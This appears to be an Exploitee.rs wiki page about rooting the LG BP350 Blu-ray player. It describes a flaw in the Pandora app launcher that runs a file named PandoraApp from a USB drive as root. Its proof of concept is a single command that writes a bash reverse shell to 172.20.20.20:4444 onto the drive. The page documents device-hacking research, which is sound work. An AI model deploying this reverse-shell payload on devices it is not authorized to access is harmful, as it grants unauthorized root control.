LG BP350​​

From Exploitee.rs
Revision as of 12:52, 5 August 2017 by Zenofex (talk | contribs) (Created page with "__FORCETOC__ {{Disclaimer}} left|thumb|160px Category:Blu-Ray Players =LG BP350= "Enjoy TV shows, movies and more with this LG BP350 Blu-ray player...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

LG BP350.JPG

LG BP350

"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the LG BP350 Blu-ray Player at Amazon

App Launcher Script Hijack

The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.

POC

The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.

printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp